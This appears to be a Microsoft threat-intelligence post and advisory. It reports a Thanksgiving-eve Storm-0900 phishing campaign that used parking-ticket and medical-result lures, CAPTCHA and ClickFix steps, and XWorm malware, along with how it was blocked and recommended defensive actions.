On Thanksgiving eve, Microsoft detected and disrupted a sophisticated phishing campaign from Storm-0900 targeting tens of thousands of U.S. users. The attack used timely themes—parking tickets, medical results, holiday references—to exploit trust and urgency. Check out the post below to explore: ➡️ What made this campaign notable ➡️ The business impact ➡️ What protected our customers ➡️ Recommended actions for organizations #ThreatIntelligence
On Thanksgiving eve, November 26, Microsoft detected and blocked a high-volume phishing campaign from a threat actor we track as Storm-0900. The campaign used parking ticket and medical test result themes and referenced Thanksgiving to lend credibility and lower recipients’ suspicion. The campaign consisted of tens of thousands of emails and targeted primarily users in the United States. Microsoft disrupted this campaign through a combination of email filtering, endpoint protections, and threat intelligence-based preemptive blocking of attacker infrastructure. The URLs in the phishing emails redirected to an attacker-controlled landing page on the malicious domain permit-service[.]top that employed several rounds of user interaction. First, users needed to solve a slider CAPTCHA by clicking and dragging a slider, followed by ClickFix, a technique that threat actors use to trick users into running malicious commands on their devices. If users fell for the ClickFix lure and executed a command in their Run prompt, a PowerShell script would run. Like similar Storm-0900 activity, this campaign led to XWorm, a popular modular malware used by many threat actors for remote access, deployment of other malware, and data theft. XWorm uses plugins that threat actors can use to perform various tasks on compromised devices. These plugins have evolved over the years. While we have not observed it being used in attacks, the latest XWorm version includes a plugin for encrypting files, giving the malware ransomware capability. Storm-0900 is a prolific threat actor that, when active, launches phishing campaigns every week. The actor abuses many popular brands in their emails. This specific campaign, along with the parking ticket and medical test result themed emails, also utilized emails purporting to be from a health care company and a government health agency. Microsoft recommends continuously raising awareness of phishing campaigns, including attack simulation training, among users. In addition to blocking the phishing emails through email filtering and preemptive blocking of infrastructure, Microsoft Defender detects the XWorm malware, malicious connections, and follow-on malicious behavior. This campaign underscores the importance of early detection and blocking of malicious activity in disrupting multi-stage attacks and stopping threat actors from performing follow-on actions.